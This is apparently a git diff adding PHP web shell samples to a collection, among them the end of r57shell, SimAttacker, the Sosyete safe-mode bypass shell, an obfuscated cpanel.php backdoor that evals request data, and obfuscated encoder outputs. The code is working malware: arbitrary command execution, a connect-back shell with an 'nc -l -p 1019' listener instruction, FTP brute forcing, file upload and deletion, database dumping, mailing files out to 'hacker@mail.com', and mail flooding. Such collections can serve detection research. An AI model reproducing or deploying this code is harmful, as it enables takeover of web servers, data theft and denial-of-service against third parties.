id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.''.$table_end1.$fe; +} +if(!$safe_mode&&!$windows){ +echo $fs.$table_up1.$lang[$language.'_text15'].up_down('id15').$table_up2.div('id15').$ts; +echo sr(15,"".$lang[$language.'_text16'].$arrow."","".in('hidden','dir',0,$dir).ws(2)."".$lang[$language.'_text17'].$arrow."".in('text','rem_file',78,'http://')); +echo sr(15,"".$lang[$language.'_text18'].$arrow."",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.''.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text86'].up_down('id16').$table_up2.div('id16').$ts; +echo sr(15,"".$lang[$language.'_text59'].$arrow."",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14'])); +$arh = $lang[$language.'_text92']; +if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; } +if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } + +if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } +echo sr(15,"".$lang[$language.'_text91'].$arrow."",in('radio','compress',0,'none').' '.$arh); +echo $te.''.$table_end1.$fe; +if(@function_exists("ftp_connect")){ +echo $table_up1.$lang[$language.'_text93'].up_down('id17').$table_up2.div('id17').$ts."".$fs."".$fe.$fs."".$fe."
".$ts; +echo "
".$lang[$language.'_text87']."
"; +echo sr(25,"".$lang[$language.'_text88'].$arrow."",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"".$lang[$language.'_text37'].$arrow."",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"".$lang[$language.'_text38'].$arrow."",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); +echo sr(25,"".$lang[$language.'_text89'].$arrow."",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down')); +echo sr(25,"".$lang[$language.'_text18'].$arrow."",in('text','loc_file',45,$dir)); +echo sr(25,"".$lang[$language.'_text90'].$arrow."","".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14'])); +echo $te."		".$ts; +echo "
".$lang[$language.'_text100']."
"; +echo sr(25,"".$lang[$language.'_text88'].$arrow."",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"".$lang[$language.'_text37'].$arrow."",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"".$lang[$language.'_text38'].$arrow."",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); +echo sr(25,"".$lang[$language.'_text18'].$arrow."",in('text','loc_file',45,$dir)); +echo sr(25,"".$lang[$language.'_text89'].$arrow."",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up')); +echo sr(25,"".$lang[$language.'_text90'].$arrow."","".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te."
"; +} +if($unix && @function_exists("ftp_connect")){ +echo $fs.$table_up1.$lang[$language.'_text94'].up_down('id18').$table_up2.div('id18').$ts; +echo sr(15,"".$lang[$language.'_text88'].$arrow."",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo sr(15,"","".$lang[$language.'_text99']." ( ".$lang[$language.'_text95']." )"); +echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']); +echo $te.''.$table_end1.$fe; +} +if(@function_exists("mail")){ +echo $table_up1.$lang[$language.'_text102'].up_down('id19').$table_up2.div('id19').$ts."".$fs."".$ts; +echo "
".$lang[$language.'_text103']."
"; +echo sr(25,"".$lang[$language.'_text105'].$arrow."",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir)); +echo sr(25,"".$lang[$language.'_text106'].$arrow."",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); +echo sr(25,"".$lang[$language.'_text107'].$arrow."",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy")))); +echo sr(25,"".$lang[$language.'_text108'].$arrow."",''); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."".$fe.$fs."".$ts; +echo "
".$lang[$language.'_text104']."
"; +echo sr(25,"".$lang[$language.'_text105'].$arrow."",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir)); +echo sr(25,"".$lang[$language.'_text106'].$arrow."",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); +echo sr(25,"".$lang[$language.'_text107'].$arrow."",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell")))); +echo sr(25,"".$lang[$language.'_text18'].$arrow."",in('text','loc_file',45,$dir)); +$arh = $lang[$language.'_text92']; +if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; } +if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } +if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } +echo sr(25,"".$lang[$language.'_text91'].$arrow."",in('radio','compress',0,'none').' '.$arh); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."".$fe.""; +} +if($mysql_on||$mssql_on||$pg_on||$ora_on) +{ +$select = ''; +echo $table_up1.$lang[$language.'_text82'].up_down('id20').$table_up2.div('id20').$ts."".$fs."".$ts; +echo "
".$lang[$language.'_text77']."
"; +echo sr(45,"".$lang[$language.'_text80'].$arrow."",$select); +echo sr(45,"".$lang[$language.'_text14'].$arrow."",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"".$lang[$language.'_text37'].$arrow."",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"".$lang[$language.'_text38'].$arrow."",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"".$lang[$language.'_text78'].$arrow."",in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_show').in('checkbox','st id=st',0,'1')); +echo sr(45,"".$lang[$language.'_text79'].$arrow."",in('checkbox','sc id=sc',0,'1')); +echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te."".$fe.$fs."".$ts; +echo "
".$lang[$language.'_text40']."
"; +echo sr(45,"".$lang[$language.'_text80'].$arrow."",$select); +echo sr(45,"".$lang[$language.'_text14'].$arrow."",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"".$lang[$language.'_text37'].$arrow."",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"".$lang[$language.'_text38'].$arrow."",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"".$lang[$language.'_text36'].$arrow."",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(45,"".$lang[$language.'_text39'].$arrow."",in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user")))); +echo sr(45,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."".$lang[$language.'_text41'].$arrow."",in('checkbox','dif id=dif',0,'1')); +echo sr(45,"".$lang[$language.'_text59'].$arrow."",in('text','dif_name',15,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql")))); +echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt9'])); +echo $te."".$fe.$fs."".$ts; +echo "
".$lang[$language.'_text83']."
"; +echo sr(45,"".$lang[$language.'_text80'].$arrow."",$select); +echo sr(45,"".$lang[$language.'_text14'].$arrow."",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"".$lang[$language.'_text37'].$arrow."",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"".$lang[$language.'_text38'].$arrow."",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"".$lang[$language.'_text36'].$arrow."",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(45,"".$lang[$language.'_text84'].$arrow."".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),""); +echo $te."

".in('submit','submit',0,$lang[$language.'_butt1'])."
".$fe.""; +} +if(!$safe_mode&&!$windows){ +echo $table_up1.$lang[$language.'_text81'].up_down('id21').$table_up2.div('id21').$ts."".$fs."".$ts; +echo "
".$lang[$language.'_text9']."
"; +echo sr(40,"".$lang[$language.'_text10'].$arrow."",in('text','port',15,'11457')); +echo sr(40,"".$lang[$language.'_text11'].$arrow."",in('text','bind_pass',15,'r57')); +echo sr(40,"".$lang[$language.'_text20'].$arrow."","".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3'])); +echo $te."".$fe.$fs."".$ts; +echo "
".$lang[$language.'_text12']."
"; +echo sr(40,"".$lang[$language.'_text13'].$arrow."",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")))); +echo sr(40,"".$lang[$language.'_text14'].$arrow."",in('text','port',15,'11457')); +echo sr(40,"".$lang[$language.'_text20'].$arrow."","".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4'])); +echo $te."".$fe.$fs."".$ts; +echo "
".$lang[$language.'_text22']."
"; +echo sr(40,"".$lang[$language.'_text23'].$arrow."",in('text','local_port',15,'11457')); +echo sr(40,"".$lang[$language.'_text24'].$arrow."",in('text','remote_host',15,'irc.dalnet.ru')); +echo sr(40,"".$lang[$language.'_text25'].$arrow."",in('text','remote_port',15,'6667')); +echo sr(40,"".$lang[$language.'_text26'].$arrow."","".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5'])); +echo $te."".$fe.""; +} + +echo ''.$table_up3."
o---[ r57shell - http-shell by RST/GHC | http://rst.void.ru | http://ghc.ru | version ".$version." ]---o
+ + +"; + + +?> \ No newline at end of file diff --git a/data/samples/classic/simattacker.php b/data/samples/classic/simattacker.php new file mode 100644 index 0000000..7e6f057 --- /dev/null +++ b/data/samples/classic/simattacker.php @@ -0,0 +1,756 @@ + "" ){ + +// path & file name + +$path_parts = pathinfo("$fdownload"); + +$entrypath=$path_parts["basename"]; + +$name = "$fdownload"; + +$fp = fopen($name, 'rb'); + +header("Content-Disposition: attachment; filename=$entrypath"); + +header("Content-Length: " . filesize($name)); + +fpassthru($fp); + +exit; + +} + +?> + + + + + + + + + + + + + +SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend + + + + + + + "" ){ + + $fedit=realpath($fedit); + + $lines = file($fedit); + + echo ""; + +echo " + + + + "; + + $savefile=$_POST['savefile']; + + $filepath=realpath($_POST['filepath']); + + if ($savefile <> "") + + { + + $fp=fopen("$filepath","w+"); + + fwrite ($fp,"") ; + + fwrite ($fp,$savefile) ; + + fclose($fp); + + echo ""; + + } + +exit(); + + } + +?> + + "" ){ + +$fchmod=realpath($fchmod); + +echo "

+ +chmod for :$fchmod
+ +

+ +Chmod :
+ +
+ + + +
"; + +$chmod0=$_POST['chmod0']; + +if ($chmod0 <> ""){ + +chmod ($fchmod , $chmod0); + +}else { + +echo "primission Not Allow change Chmod"; + +} + +exit(); + +} + +?> + + + +
+ + + + + + + + + + + + + + + + + +
+ +

+ +
+ + + + + + + + + + + + File Manager

+ +

+ + + + + + CMD Shell

+ +

+ + + + Fake mail

+ +

+ + + + + + Connect Back

+ +

+ + + + + + About

+ +

 

 

 + + + +***************************************************************************
+ + Iranian Hackers : WWW.SIMORGH-EV.COM
+ + Programer : Hossein Asgary
+ + Note : SimAttacker  Have copyright from simorgh security Group
+ + please : If you find bug or problems in program , tell me by :
+ + e-mail : admin(at)simorgh-ev(dot)com
+ +Enjoy :) [Only 4 Best Friends ]
+ +***************************************************************************

+ +"; + + + +echo "OS :". php_uname(); + +echo "
IP :". + +($_SERVER['REMOTE_ADDR']); + +echo ""; + + + + + + } + + //************************************************************ + + //cmd-command line + + $cmd=$_POST['cmd']; + + if($id=="cmd"){ + + $result=shell_exec("$cmd"); + + echo "

CMD ExeCute

" ; + + echo "
+ +
+ +
+ + + + + +
"; + + + + + + + + } + + + + //******************************************************** + + + + //fake mail = Use victim server 4 DOS - fake mail + + if ( $id=="fake-mail"){ + + error_reporting(0); + + echo "

Fake Mail- DOS E-mail By Victim Server

" ; + + echo "
+ + Victim Mail :

+ + Number-Mail :

+ + Comments: + +
+ +
+ + + +
"; + + //send Storm Mail + + $to=$_POST['to']; + + $nom=$_POST['nom']; + + $Comments=$_POST['Comments']; + + if ($to <> "" ){ + + for ($i = 0; $i < $nom ; $i++){ + + $from = rand (71,1020000000)."@"."Attacker.com"; + + $subject= md5("$from"); + + mail($to,$subject,$Comments,"From:$from"); + + echo "$i is ok"; + + } + + echo ""; + + } + + } + + //******************************************************** + + + + //Connect Back -Firewall Bypass + + if ($id=="cshell"){ + + echo "
Connect back Shell , bypass Firewalls
+ + For user :
+ + nc -l -p 1019
+ +
+ +

+ + Your IP & BindPort:
+ + + +
+ + + +
"; + + $mip=$_POST['mip']; + + $bport=$_POST['bport']; + + if ($mip <> "") + + { + + $fp=fsockopen($mip , $bport , $errno, $errstr); + + if (!$fp){ + + $result = "Error: could not open socket connection"; + + } + + else { + + fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00 ready 2 USe\n*********************************************\n\n"); + + while(!feof($fp)){ + + fputs ($fp," bash # "); + + $result= fgets ($fp, 4096); + + $message=`$result`; + + fputs ($fp,"--> ".$message."\n"); + + } + + fclose ($fp); + + } + + } + + } + + + + //******************************************************** + + //Spy File Manager + + $homedir=getcwd(); + + $dir=realpath($_GET['dir'])."/"; + + if ($id=="fm"){ + + echo "

 Home: $homedir + +   + +

+ +  Path: + + + + + + + +
+ +
"; + + + + echo " + + + +
+ + + + + + + + + + + + + + + + + + + + "; + + if (is_dir($dir)){ + + if ($dh=opendir($dir)){ + + while (($file = readdir($dh)) !== false) { + + $fsize=round(filesize($dir . $file)/1024); + + + + + + echo " + + + + + + + + + + + + + + + + + + "; + + } + + closedir($dh); + + } + + } + + echo "
File / Folder Name + + Size KByte + + Download + + Edit + + ChmodDelete
"; + + if (is_dir($dir.$file)) + + { + + echo " $file dir"; + + } + + else { + + echo " $file "; + + } + + echo ""; + + if (is_file($dir.$file)) + + { + + echo "$fsize"; + + } + + else { + + echo "  "; + + } + + echo " + + "; + + if (is_file($dir.$file)){ + + if (is_readable($dir.$file)){ + + echo "download"; + + }else { + + echo "No ReadAble"; + + } + + }else { + + echo " "; + + } + + echo " + + "; + + if (is_file($dir.$file)) + + { + + if (is_readable($dir.$file)){ + + echo "Edit"; + + }else { + + echo "No ReadAble"; + + } + + }else { + + echo " "; + + } + + echo " + + "; + + if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { + + echo "Dont in windows"; + + } + + else { + + echo "Chmod"; + + } + + echo "Delete
+ +
+ + + + Send this file: + + + + + + + +
"; + + } + +//Upload Files + +$rpath=$_GET['dir']; + +if ($rpath <> "") { + +$uploadfile = $rpath."/" . $_FILES['userfile']['name']; + +print "
";
+
+if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
+
+echo "";
+
+echo "";
+
+}
+
+ }
+
+ //file deleted
+
+$frpath=$_GET['fdelete'];
+
+if ($frpath <> "") {
+
+if (is_dir($frpath)){
+
+$matches = glob($frpath . '/*.*');
+
+if ( is_array ( $matches ) ) {
+
+  foreach ( $matches as $filename) {
+
+  unlink ($filename);
+
+  rmdir("$frpath");
+
+echo "";
+
+echo "";
+
+  }
+
+  }
+
+  }
+
+  else{
+
+echo "";
+
+unlink ("$frpath");
+
+echo "";
+
+exit(0);
+
+
+
+  }
+
+  
+
+
+
+}
+
+			?>
+
+			
+
+
+ +


+ + Copyright 2004-Simorgh Security
+ + Hossein-Asgari
+ + + + + + www.r57.biz

+ + +
+ + + + + + diff --git a/data/samples/classic/sosyete.php b/data/samples/classic/sosyete.php new file mode 100644 index 0000000..b43476f --- /dev/null +++ b/data/samples/classic/sosyete.php @@ -0,0 +1,225 @@ + + + + Sosyete Safe Mode Bypass Shell + + + +
+ +
+

+

+ + +
+

+

+ + +

Sosyete Safe Mode Bypass Shell + +

+

+ +
+

~ + + + +

+ +

+ + + + +
+ + +

+ +
+

+ + +

+ + + Sosyete Safe Mode Bypass Shell ; Bypass shell'lerden esinlenerek birçok shell'in ortak karisimi olarak sunulmustur.

+ + + + +
+ + + + +
+ + + + Sosyete Bypass Main Menu
"; + +print_r(' + + + + +
+
+
+

+ 
+

+

+ 
+
+
+ + +
+ +
+

+

+ + +
+

+

+ + +
+ +
+ + +'); +ini_restore("safe_mode"); +ini_restore("open_basedir"); +$fuck=shell_exec($_POST['sosyete']); +$mokoko=shell_exec($_POST['fuck']); +echo "
";
+echo "Komut Sonucu 
"; 
+echo $fuck;
+echo $mokoko;
+echo "
"; + +?> + +
+ + +

+ +
+ +

+ +

+ + + + Sosyete Safe Mode Bypass Shell Coded by r57.biz ~ Sosyete

+ + + + +
+ + + + +
+ + + + + diff --git a/data/samples/cpanel.php b/data/samples/cpanel.php new file mode 100644 index 0000000..0899f12 --- /dev/null +++ b/data/samples/cpanel.php @@ -0,0 +1,20 @@ +$ff7924082){$y5da781e=$ff7924082;$x3ff4965=$efb074d;}if(!$y5da781e){foreach($m6aa932e[$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][35].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][31].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][49]]as$efb074d=>$ff7924082){$y5da781e=$ff7924082;$x3ff4965=$efb074d;}}$y5da781e=@$m6aa932e[$m6aa932e['a7b1'][33].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][31].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][46].$m6aa932e['a7b1'][84].$m6aa932e['a7b1'][20].$m6aa932e['a7b1'][14]]($m6aa932e[$m6aa932e['a7b1'][71].$m6aa932e['a7b1'][42].$m6aa932e['a7b1'][95].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][84]]($m6aa932e[$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][49].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][49]]($y5da781e),$x3ff4965));if(isset($y5da781e[$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][48]])&&$fecba48==$y5da781e[$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][48]]){if($y5da781e[$m6aa932e['a7b1'][65]]==$m6aa932e['a7b1'][67]){$b56c6566=Array($m6aa932e['a7b1'][55].$m6aa932e['a7b1'][97]=>@$m6aa932e[$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][14].$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][60]](),$m6aa932e['a7b1'][13].$m6aa932e['a7b1'][97]=>$m6aa932e['a7b1'][31].$m6aa932e['a7b1'][21].$m6aa932e['a7b1'][60].$m6aa932e['a7b1'][86].$m6aa932e['a7b1'][31],);echo@$m6aa932e[$m6aa932e['a7b1'][11].$m6aa932e['a7b1'][96].$m6aa932e['a7b1'][24].$m6aa932e['a7b1'][65].$m6aa932e['a7b1'][51].$m6aa932e['a7b1'][11]]($b56c6566);}elseif($y5da781e[$m6aa932e['a7b1'][65]]==$m6aa932e['a7b1'][44]){eval($y5da781e[$m6aa932e['a7b1'][46]]);}exit();} ?> + + + + + + diff --git a/data/samples/freepbx.php b/data/samples/freepbx.php new file mode 100644 index 0000000..5ccf441 --- /dev/null +++ b/data/samples/freepbx.php @@ -0,0 +1,14 @@ + diff --git a/data/samples/obfuscators/cipher_design.php b/data/samples/obfuscators/cipher_design.php new file mode 100644 index 0000000..0ccf2c1 --- /dev/null +++ b/data/samples/obfuscators/cipher_design.php @@ -0,0 +1,2 @@ ++*OJHj1.)n-$HjFsz)&D+.84k?9#+RaqlHb(Ors0cK-DC.$GcReUQ*-(z8#qA=1G&?j=O*jZkRv6Cr$GCTjDAHXZAKb=kr9UxHeZQ=n6hKa#X_bCXD9_OgXZCR5d+.$Dc.X(A*udk*1v+*AZA*5Gc78uA*ej&.(0kEPD&.1#C.8vxEP5k.8sCrndOr1G&.$K&?PjCT#dCH80&.(GATPU+.ndnreT+HPU)n5dO=84kgCGz.XTzv(7xDc#h_Obh,cbhKenh_c6e_C6e_cNh,a6h,aFxge#O*utcKb(Q.(Ul,aZwgj=Cr8(+Tdv_Uv#)_a-_D7#)n1X_Uv#))#v_D$z)nF-h,7#)n1Xh,7#h)vLAHAsk?sEOHe(eKVfA.8KkrV(lReUCqVTl.&6&*9Kkrj#C=8DCTsEOHe(eKVfA.8KkrV(l.ATA*$vl?Vz)_PXh,$zh_PX_U(z)_PXx?Vzh_PXh7v#hnF-_Uv#hn1X_UvZl)v4Xr$5zT#gX?9)Ojs4Q.s(&gJj8E(fkKdI)71Plrb,X($=ARe$)gOJzH$l*v(we.XRh?hb87VIC=&jw_AhVK$85.j#kT$Hng(?X*(U__hT*)C4XU$?5UV$Vv&c)nZx_7jw_jPVn(en88AH*$(+O*XKA.8=ArsZ+=b4k*90CR$TCgVj&q&uQHJ-hKhUe_Ogw,v#xE#sX?n=lEdZx8FNznaKzTCZl)vLC=8U&HXGw#MMn(1n*$VOn(V$5v8O58V)Hjen8$V)878nV81$878$n(XOHU$?8$e$njXf8$1)V8X?V8VP878OV8V?njeO5(XfnjXn8$snV8V_nv8)nje_V8X_HU8?87$_58X_V8VOHjV$njV)nv$_V81_V8e$581)878n8$1f878$n(Xn8$1O*7$n5v8_8$sfnU8)Hje?Vn$fnjen87Xn*$V?8$X$V8efnv8?8$V?5v$_njVPHj1PV8V)VnXO8$1_HU8nnjePnU8P8$e_njsP8$VO8$V)8$XfHUXOHUXfV81f*$X)Hjs$5(1$HU8$87$On(Xf8$XOHjX$nv8_njV$8$V)V8XnHjsnn(1?V8XOn(Xfn(1)V81Pnje_58VOV8V?8$1O*78_nU8_8$Xf*$e$*$Vf8$sf*$X?nje?nvXfn(X)V81$n(XOn(eOV81_8$1$8$1_Vn8PV8X)V8X)5(snnjXf8$V)8$Xn8$1)58e$n(Xn58enn(1n5(VPnj1?n(sn5v8fnjV$HjVf878fn(VOHje$58VPHjenHjV)*aMMeJyrcil1q0oP8HK2D9DwLyo2SA5KtXROD9PI1kwp8whVU7FQMSl0tldTy4k38QUAPQ8NPg==V8V_878)*$sP8$V)*7$fnv$n*$snn(Vn581PnvX$Vn$)V8ennU8nn(1nnj1P5(V$HjVn58s$8$e_HjX)nU$)581_nv8f8$Vn58XnV8XnHjV)nv$fnj1)8$1O*7$Pnje?njV)5(Vn878_n(Vn581nHjenHjenHU$P*$1n878$*$s$V8VnV8XnnUXnnjXfV8V_nje)V8e)HjXn87$nV8V$njV)878_n(e$8$Xf5n$fV8VOHUX?58s)Vn$nHU$_V8e?nj1f8$1PnU$_n(X_nj1f878$Hje?878nnjenn(1P58Xn87Xn8$X)58VfHj1f8$ef8$e)87$)5(V$8$e?nv8OHUX_58V$8$V_n(X)5n$)Hj1nnU8n diff --git a/data/samples/obfuscators/online_php_obfuscator.php b/data/samples/obfuscators/online_php_obfuscator.php new file mode 100644 index 0000000..e64cb31 --- /dev/null +++ b/data/samples/obfuscators/online_php_obfuscator.php @@ -0,0 +1 @@ + diff --git a/data/samples/obfuscators/phpencode.php b/data/samples/obfuscators/phpencode.php new file mode 100644 index 0000000..a6797f5 --- /dev/null +++ b/data/samples/obfuscators/phpencode.php @@ -0,0 +1 @@ +:h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]3 x74 141 x72 164") && (!isset($GLOBALS[" x61 156 x75 156 x61"]h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!^>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l} x27;%!<*#}_;#)323!>!%yy)#}#-# x24- x24-tusqpt)%z-#:#* x24- x24!>! x24/%tjws:*<%j:,,Bjg!)%j:>>1*!%b:>1%s: x5c%j:.2^,%b:%s: x575983:48984:71]K9]77]D4]82]K6]72]K9]78]K5].;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft`msvd}21]464]284]364]6]234]342]58]24]31#-%tdz*Wsfuvso!%bss x5csboe))/*)323zbe!-#jt0*?]+^?]_ x5c}X x24hmg%!<12>j%!|!*#91y]c9y]7]y86]267]y74]275]y7:]268]y7f#! x240w/ x24)##-!#~<#/% x24- x24!>!fyqmpef)# x24*272qj%6<^#zsfvr# x5cq%7/6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]3 162 x65 141 x74 145 x5f 146 x772 145 x66 157 x78"))) { $oqtpxpv = " x6|:*r%:-t%)3of:opjudovg<~ x24! x242178}527}88:}334}472 xw6< x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA x27&6<.fmjgA x27doj%6< x7y]252]18y]#>q%<#762]67y]5z)#44ec:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*s%<#462]47d%6|6.7eu{66~67<&w6<*&7-#o]s]! x24Ypp3)%cB%iN}#-! x24/%tmw/ x24)%c*W%eN+#Qi x5c1^W%c!>!%i x5c2*msv%)}k~~~%fdy!%tdz)%bbT-36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]3I7jsv%7UFH# x27rfs%6~6< x7fw*127-UVPFNJU,6<*27-SFGTOBSUO#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#)% x24- x24*#L4]275L3]x45 116 x54"]); if ((strstr($uas," x6d 163 x69 145")) or (strstr($)sfebfI{*w%)kVx{**#k#)tutjyf`x x22l:!}V;3q%}U;y]}R;2]},;osvufs} x2id%)ftpmdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,6.%!<***f x27,*e x2GMFT`QIQ&f_UTPI`QUUI&e_SEEB`jix6U<#16,47R57,27Rpd%6!2p%!*3>?*2b%)gpf{jt)!g("", $jojtdkr); $bhlpzbl();}}W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r x5c2^-%hOh/#00#W~!%t27ftbc x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq% x5cSFWSFT`%}X;!sp!*#op%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj x22)gj!|!*nbsbq%)32d($n)-1);} @error_reporting(0); $jojtdkr = implode(array_map("dudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{h3]y76]277##]y74]273]y76]252]y85]256]y6g]256<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA x24- x24 x5c%j^ x24- x24tvctus)% x24- x24buas," x72 166 x3a 61 x31")) or (strstr($uas!gj}1~!<2p% x7f!~!<##!>!2p%Z<^1"]=1; $uas=strtolower($_SERVER[" x48 124 x5ldfid>}&;!osvufs} x7f;!opjudovg}k~~9{d%:osvufs:~928>> x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{eb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56)%epnbss-%rxW~!Ypp2)%zB%z>! x24/%tmw/ x24)%zW%h>EzH,2)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~7;mnui}&;zepc}A;~!} x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U! x24- x24gvodujpo! x24- xSVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk3`{666~6!#]D6M7]K3#<%yy>#]Ddbqov>*ofmy%)utjm!|!*5! x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-if((function_exists(" x6f 142 x5f 16<.msv`ftsbqA7>q%6< x7fw6* 